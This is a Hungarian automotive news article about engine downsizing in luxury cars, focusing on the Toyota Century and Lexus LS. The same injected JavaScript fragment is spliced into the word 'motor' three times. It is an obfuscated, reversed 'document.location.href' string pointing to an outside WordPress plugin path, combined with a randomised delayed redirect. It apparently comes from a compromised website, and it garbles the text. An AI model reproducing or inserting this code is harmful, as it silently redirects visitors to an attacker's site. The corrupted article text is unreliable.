A luxusautók ügyfelei nem szeretik a méretcsökkentést. A négyhengeres motoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor nem hathengeres, a V6-os nyilvánvalóan nem ér fel a V8-assal, és hogyan is érhetnénk be nyolc hengerrel, ha korábban tizenkettővel gazdálkodtunk. Az utóbbi panasz az új generációs Toyota Century vásárlóközönségétől származhat, hiszen az elődmodell selyemfinomságú V12-es benzinmotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torjának helyébe a kifutó Lexus LS V8-as hibrid hajtásláncát szerelték. Az új generációs Lexus LS is megjárta egyébként: ezt a bizonyos V8-ast egy V6-osra cserélte a gyártó. Ez teljesítményében és nyomatékában is elmarad a korábbi nyolchengeres motoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tortól, ám a 3 x 3 + 1 fokozatú erőátviteli egységnek köszönhetően mégis fürgébb és takarékosabb annál. Épp…
- Hirdetés -